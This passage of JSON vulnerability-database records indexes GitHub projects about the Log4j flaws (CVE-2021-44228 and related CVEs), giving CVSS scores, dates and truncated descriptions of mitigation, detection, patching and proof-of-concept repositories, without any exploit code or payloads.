{"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-10T22:35:00", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-04-04T10:19:19", "id": "CC4175EB-3B91-5ABB-A700-84FC1105AAD5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-20T02:11:24", "description": "# S\u00e5rbarheter i Log4j\n\nOppdatering 19.12.2021: Det oppdages stad...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:48:49", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-45105", "CVE-2021-4104", "CVE-2021-44228", "CVE-2019-17571"], "modified": "2021-12-19T23:28:13", "id": "3DFE8091-03AE-565B-A198-BD509784502C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:45:43", "description": "# Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "342CC1B7-6E24-5767-A7B1-90B95A91B503", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:38:51", "description": "# Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "C76F7089-967B-5A7F-B8DA-629452876A2A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:34:22", "description": "# Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "DECBAC7B-9235-5E00-81C1-142CD41306FB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:45:38", "description": "# Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-17T20:14:39", "description": "# Detecting CVE-2021-44228 and CVE-2021-450...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T21:57:58", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2021-12-17T14:19:20", "id": "43A7C9D3-EBB3-57B1-B8FB-C651B36501C2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-10T00:00:00", "description": "# Log4j CVE-2021-44228 and CVE-2021-45046\n\n## Requisites\n\nUse a ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T13:08:03", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-02-07T01:16:44", "id": "F7994B92-2846-5644-8B68-EFB6DFB95ED2", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-04-04T08:44:38", "description": "# Log4Shell-Rex\n\nThe following RegEx was written in an attempt t...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T21:39:51", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-04-04T08:12:01", "id": "4557B39D-1DE6-59FA-AF6C-935E8BB15AE5", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-31T15:07:30", "description": "# log4shell.tools [![build](https://github.com/alexbakker/log4sh...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T21:47:41", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-03-31T03:59:41", "id": "578E61DA-1B13-5170-9DAC-60D30F7F8C99", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-19T06:41:27", "description": "# logmap 0.6 - Log4j jndi injection fuzz tool\n\nUsed for fuzzing ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-14T08:41:18", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-03-19T05:15:27", "id": "95033F5C-FFFE-58C2-9799-C77E326ACD83", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-13T05:32:54", "description": "# log4j-shell-poc\nA Proof-Of-Concept for the recently found CVE-...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-13T03:02:47", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228"], "modified": "2022-01-13T03:09:10", "id": "030066BA-6C48-5AD9-9EAF-11DECB6A3930", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-16T20:08:33", "description": "# tejas-nagchandi/CVE-2021-45046\n\n## Attack\n![image](https://use...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T16:28:11", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228"], "modified": "2021-12-16T07:17:16", "id": "C72759ED-7C42-593C-A3C7-94E2CDB2B105", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-04T20:12:08", "description": ".. image:: images/Mitiga_logo.png\n\nIntroduction\n-------------\nwe...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T15:42:06", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228"], "modified": "2022-01-04T14:01:16", "id": "6600C311-30E5-566D-98F1-AC47E752EBEA", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-26T04:02:34", "description": "# Log4jHotPatch\n\nThis is a tool which injects a Java agent into ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T01:24:51", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-03-26T01:44:01", "id": "7B48A97D-242D-55E0-8A13-BD2727C1261F", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-24T18:38:47", "description": "# Apache Log4j2 CVE-2021-44228 node agent\n\nAWS has developed an ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T20:17:41", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-03-24T14:29:40", "id": "161B70B2-DFA5-54B6-A4CE-45B79999AAC6", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-31T08:25:10", "description": "# nse-log4shell\n\nNmap NSE scripts to check against log4shell or ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-12T22:52:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228", "CVE-2021-45046"], "modified": "2022-03-31T02:58:51", "id": "C640B511-D1E9-5F57-964D-3826F1C68DF8", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-01-05T17:22:12", "description": "# Sitecore.Solr-log4j-mitigation CVE-2021-44228\nThis repository ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T08:46:41", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228"], "modified": "2022-01-05T17:02:45", "id": "F1E9BE6D-4024-56FB-80BB-B10ED5889144", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-03-11T00:07:13", "description": "# Log4j 2.15.0 Privilege Escalation -- CVE-2021-45046\n\n## Attack...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-15T05:48:53", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-44228"], "modified": "2022-03-10T22:19:35", "id": "BADF55AF-60C5-5E33-BC19-5DC25FB9E196", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-16T14:09:40", "description": "# About\n\nA playground for poking at the [critical log4j (aka Log...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", 